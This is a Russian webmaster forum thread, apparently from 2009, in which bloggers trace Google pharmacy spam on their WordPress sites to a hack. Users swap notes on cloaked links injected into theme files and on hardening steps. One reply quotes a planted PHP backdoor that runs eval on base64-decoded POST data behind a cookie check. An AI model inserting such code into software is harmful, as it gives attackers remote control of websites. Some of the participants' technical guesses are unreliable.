Взлом WP (название изменено)

Бля пипец, слов нет.
На ревью (на WP) стало идти гораздо меньше тематического трафика с гугла. Думаю ну бывает, колбасит, а тут решил зайти в Вебмастер тулз и прихуел.
Гугл видит нормальные внешние ссылки по кеям, но в содержании сайты 95 позиций из топ-100 одни виагры и ханахи всякие, короче он видит у меня в содержании сайта одни таблетки
На сайте естественно этого ничего нет. Начинаю выяснять в чем дело и оказывается следующее.
В Аксимете выловлено 3600 спамовых камментов. WP их не показывает. Захожу в гугл и делаю поиск xanax по моему сайту. Он находит несколько вхождений этого слова на сайте. Открываю через гугл кешированную страницу, этого слова естественно не вижу, но делаю открыть текстовую версию и бля на тебе, гугл видит все камменты, которые были пойманы Аксиметом. Вот такой вот бля неприятный сюрприз. Только материться хотелось.
Сейчас весь спам из аксимета удалил, буду ждать, что скажет гугл.

Эту фишку про Аксимет только я не знал или это давно известный факт?

Последний раз редактировалось: miroz (28/01/09 в 08:25), всего редактировалось 1 раз

Только что проверил еще один блог, где стоит аксимет. Таже фигня.

Так что всем кому дороги проекты рекомендую периодически удалять спамовые камменты из аксимета.

miroz писал:

стало идти гораздо меньше тематического трафика с гугла.

Может все таки ботов хрумера стало меньше идти а не тематического трафика ?

ни на одном из блогов не нашел ничего похожего
какие версии WP и плагина?

WP 2.1 версия и 2.3.2 (на обоих замечено)
Aksimet 1.2.1 и 2.1.3

Если периодически удаляешь спам из раздела Aksimet Spam(), то ничего не будет. А если там полно спама (как было у меня, так как я давно не следил за этим), то могут быть хреновые последствия.

Оффтопик: to girl4look: Ты читать не умеешь или ботов от гугла отличать?

самый необновленный у меня WP 2.5.1 и Akismet 2.0.2 - такой проблемы нет, так что видимо стоит проапдейдиться (наверное старый баг какой-то был, который исправили уже)

короче это не акисмет, у меня такая проблема была, это взлом был, стукни мне посмотрим, может я ошибаюсь

ты глянь в хтмл-коде, где нормальные каменты располагаются, а где твои ксанаксы - если они располагаются не в том месте, где обычно положено быть каментам - значит тебя поломали скорее всего и акисмет ни при чём.

не должно быть этой траблы, иначе бы все уже орали на каждом углу...

Аксиментом пользуются 99 % блогеров

поломали 100%

Да я думаю поторопился я насчет Аксимета это у меня не в камментах, это в футере, беру таймаут разобраться.
Странно в кеше эсли смотрим исходный код я вижу эту дрянь, а если сейчас сайт открыть то не вижу.

было такое. спам-ссылки выводятся клоакингом по юзер-агенту вроде.
глянь http://www.google.com/search?num=100&hl=en&lr=&safe=off…tnG=Search

быстрое решение - это "убрать wp_footer() и wp_head() из темы"

зы - последствия в гугле нивелируются через некоторое время. у меня на одном блоге так пр4 слетел. после того как эту херь я грохнул - через месяцок всё поправилось.

У меня такое было. После тега </body>вставили кучу ссылок на таблетки. По моему это называется sql injection, обезательно апдейть,проверь бд вордпреса, меняй пароли доступа к бд и вордпресу.

batyar, а как проверять бд вордпресса?..

Да, Аксимет тут ни причем, ложная тревога. Это был взлом.
Сейчас обновился. Пароли менять обязательно? Или это просто рекомендация?
Как в базе пароль поменять? где?

miroz писал:

Пароли менять обязательно? Или это просто рекомендация? Как в базе пароль поменять? где?

обязательно поменять, пароль для БД меняется в клиентской части на хосте, если нет прав доступа прям в phpmyadmin, если фрихост попроси суппорт поменять

Аксимент ни при чем.
у меня было тоже самое, сначала повесили ссылки в header.php, я вычистил и закрыл правами его, через пару дней эти же сылки были в теле поста.
заполз в бд, посмотрел дату добавления этой дряни - после логи апача, и выяснилось, что это было добавлено через админку wp. я охренел и с помощью .htaccess закрыл wp-admin и wp-login.php, этого хватило. более ссылок на виагру и ханах не появлялось.

У меня таким способом были тоже взломаны блоги. Погуглил нашел статью http://cssing.org.ua/2008/06/01/wp-footer-exploit/
Рекомендую всем владельцам блогов проверится таким способом.

Повышение безопасности wordpress

сегодня проверил свои блоги ради интереса через гуглю на все воткнули типа этого<?php if(md5($_COOKIE['694b248c580030ea'])=="0762be3b43ab8216e88511c21e96c453"){ eval(base64_decode($_POST['file'])); exit; } ?>
гадство придется обновлять теперь все блоги

batyar писал:

У меня такое было. После тега </body>вставили кучу ссылок на таблетки. По моему это называется sql injection, обезательно апдейть,проверь бд вордпреса, меняй пароли доступа к бд и вордпресу.

Заеплись бы инжектить. У ВП хорошая длина ключа, да и инт они не забывают ))) Я запрещал запрос блога более чем 10 раз с одного ип и делал пароли от 12 и выше символов (то есть инжектом просто по теории не взять) - всё равно инфреймили. Имхо, он если и делают инжект, то общий инжект хоста, внутренних паролей. А так, если не это, то имхо просто дыра в ВП есть. Вот на Джумле же находили дыры, когда по конанде в какой-то там её форме она подгружала как фтп клиент любой файл, типа демона в сgi.

Да поставьте вы мод_секюрити и забудьте про 90% дыр.